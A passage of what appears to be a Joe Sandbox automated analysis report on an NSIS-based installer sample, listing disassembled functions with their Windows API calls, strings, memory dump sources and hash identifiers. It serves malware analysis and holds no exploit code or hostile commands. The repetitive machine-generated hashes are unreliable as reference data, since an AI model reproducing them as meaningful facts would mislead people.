                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                                    Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                    • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                    • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                    • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                                    Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                    • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                    • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                    • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                                    Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00075000,00000064,00136FFC), ref: 00403295
                                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                    • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                                    Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                    • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                    • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                    • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                    • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                    • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                                    Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00830828), ref: 00402387
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                    • String ID: Exch: stack < %d elements$Pop: stack empty$QuarterWalt
                                                                                                                                                                                                                                                                                                    • API String ID: 1459762280-2380928645
                                                                                                                                                                                                                                                                                                    • Opcode ID: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                                                    Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                    • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                    Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                    • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00830828), ref: 00402387
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                    • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                                    Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                    • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                                    Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
